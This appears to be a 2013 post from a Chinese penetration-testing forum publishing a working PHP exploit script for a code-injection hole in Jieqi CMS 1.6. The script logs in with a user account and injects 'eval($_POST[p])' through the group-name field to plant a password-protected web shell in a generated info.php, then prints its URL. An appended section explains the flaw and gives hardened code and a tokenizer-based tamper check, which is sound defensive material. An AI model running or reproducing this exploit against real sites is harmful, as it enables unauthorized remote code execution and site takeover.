China Network Penetration Testing Alliance

Title: Jieqi CMS V1.6 PHP Code Execution 0day Vulnerability EXP

Author: admin    Time: 2013-2-23 11:28
Jieqi Website Management System (JIEQI CMS for short; China National Copyright Administration software copyright registration number 2006SR03382) is a modular website-building system described as simple and flexible, high-performance, and secure and reliable. We provide the currently most popular Jieqi serialized novel system, the Jieqi original comics system and digital publishing solutions, as well as all kinds of website customization services.

This system has multiple remote security vulnerabilities. The one reported today is a remote code execution vulnerability in version 1.6, which should be more than two years old by now.
It requires a user account that is allowed to create a group (circle).
<?php

print_r('
+---------------------------------------------------------------------------+
Jieqi CMS V1.6 PHP Code Injection Exploit
by flyh4t
mail: phpsec at hotmail dot com
team: http://www.wolvez.org
+---------------------------------------------------------------------------+
');

/**
 * works regardless of php.ini settings
 */
if ($argc < 5) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path username password
host:      target server (ip/hostname)
path:      path to jieqicms
username:  a username who can create group
password:  password of that user
Example:
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host     = $argv[1];
$path     = $argv[2];
$username = $argv[3];
$password = $argv[4];

/* get cookie: log in and keep the session cookie in a jar file */
$cookie_jar_index = 'cookie.txt';
$url1   = "http://$host/$path/login.php";
$params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1";
$curl1  = curl_init();
curl_setopt($curl1, CURLOPT_URL, $url1);
curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index);
curl_setopt($curl1, CURLOPT_POST, 1);
curl_setopt($curl1, CURLOPT_POSTFIELDS, $params);
ob_start();
$data1 = curl_exec($curl1);
if ($data1 === FALSE) {
    // the original read curl_error($ch), an undefined handle; $curl1 is the handle in use
    echo "cURL Error: " . curl_error($curl1);
    exit('exploit failed');
}
curl_close($curl1);
ob_clean();

/* get shell: the group name (gname) is written unescaped into the group's info.php */
$params  = '-----------------------------23281168279961
Content-Disposition: form-data; name="gname"

';
$params .= "';";
$params .= 'eval($_POST[p]);//flyh4t
-----------------------------23281168279961
Content-Disposition: form-data; name="gcatid"

1
-----------------------------23281168279961
Content-Disposition: form-data; name="gaudit"

1
-----------------------------23281168279961
Content-Disposition: form-data; name="gbrief"

1
-----------------------------23281168279961--
';

$url2   = "http://$host/$path/modules/group/create.php";
$curl2  = curl_init();
$header = array(
    'Content-Type: multipart/form-data; boundary=---------------------------23281168279961'
);
curl_setopt($curl2, CURLOPT_URL, $url2);
curl_setopt($curl2, CURLOPT_HTTPHEADER, $header);
curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index);
curl_setopt($curl2, CURLOPT_POST, 1);
curl_setopt($curl2, CURLOPT_POSTFIELDS, $params);
ob_start();
curl_exec($curl2);
curl_close($curl2);
$resp = ob_get_contents(); // $resp is the response body (the original comment called it $rs)
ob_clean();

// the response carries the new group id as g=<id>; info.php lives under that id
preg_match('/g=([0-9]{1,4})/', $resp, $shell);
//print_r($shell);
//print_r($resp);
$url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php";
echo "view your shell here (password: p)\r\n";
echo $url;
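The root cause the post relies on is that the group name is pasted between single quotes into a generated PHP file (files/group/userdir/.../info.php), so a name containing a quote and a semicolon turns the rest of the value into code. The following is an added example written for this page, not code from the post or from Jieqi CMS: it reproduces that vulnerable pattern next to two hardened alternatives and a tokenizer-based check that tells whether a generated info.php contains anything but plain string assignments. The function names, the $group array and the temp-directory paths are assumptions made for illustration; the file name info.php and the gname/gbrief field names follow the post.

```php
<?php
// Added example (not Jieqi's code). Function names, the $group array and the
// temp-directory paths are assumptions; info.php, gname and gbrief follow the post.

// Vulnerable pattern: the value is interpolated between single quotes, so a
// value of the form  '; <php code>//  closes the literal and the rest runs.
function write_info_vulnerable(string $file, array $group): void
{
    $php  = "<?php\n";
    $php .= "\$gname  = '" . $group['gname'] . "';\n";
    $php .= "\$gbrief = '" . $group['gbrief'] . "';\n";
    file_put_contents($file, $php);
}

// Hardened while still emitting PHP: var_export() produces a quoted literal with
// every ' and \ escaped, so no value can terminate the string it sits in.
function write_info_hardened(string $file, array $group): void
{
    $php  = "<?php\n";
    $php .= '$gname  = ' . var_export((string) $group['gname'], true) . ";\n";
    $php .= '$gbrief = ' . var_export((string) $group['gbrief'], true) . ";\n";
    file_put_contents($file, $php);
}

// Better still: keep data as data. A JSON file under a path the web server never
// executes cannot become code whatever it contains.
function write_info_json(string $file, array $group): void
{
    file_put_contents($file, json_encode($group, JSON_UNESCAPED_UNICODE | JSON_THROW_ON_ERROR));
}

// Integrity check for generated files: tokenize and accept only the open tag,
// whitespace, variable names, '=', string literals and ';'. Any other token
// (T_EVAL, '(', a function name, ...) means something else made it into the file.
function info_file_is_plain_assignments(string $file): bool
{
    $allowed = [T_OPEN_TAG, T_WHITESPACE, T_VARIABLE, T_CONSTANT_ENCAPSED_STRING];
    foreach (token_get_all(file_get_contents($file)) as $tok) {
        if (is_array($tok)) {
            if (!in_array($tok[0], $allowed, true)) {
                return false;
            }
        } elseif ($tok !== '=' && $tok !== ';') {
            return false;
        }
    }
    return true;
}

// Constructed input with the same shape as the gname value used in the post.
$group = ['gname' => "'; eval(\$_POST[p]);//", 'gbrief' => '1'];
$dir   = sys_get_temp_dir();

write_info_vulnerable("$dir/info_vuln.php", $group);
write_info_hardened("$dir/info_safe.php", $group);
write_info_json("$dir/info.json", $group);

var_dump(info_file_is_plain_assignments("$dir/info_vuln.php"));
var_dump(info_file_is_plain_assignments("$dir/info_safe.php"));
```

Run with the PHP CLI (7.3 or later for JSON_THROW_ON_ERROR). The check returns false for the file written by write_info_vulnerable, because the injected eval() shows up as a T_EVAL token followed by a parenthesis, and true for the var_export() version, where the whole value is a single escaped string literal. The same tokenizer check can be run over existing per-group files on a deployed site to find ones that were already tampered with, which is a cheaper signal than grepping for eval, since it flags any non-assignment content at all.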




Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/) Powered by Discuz! X3.2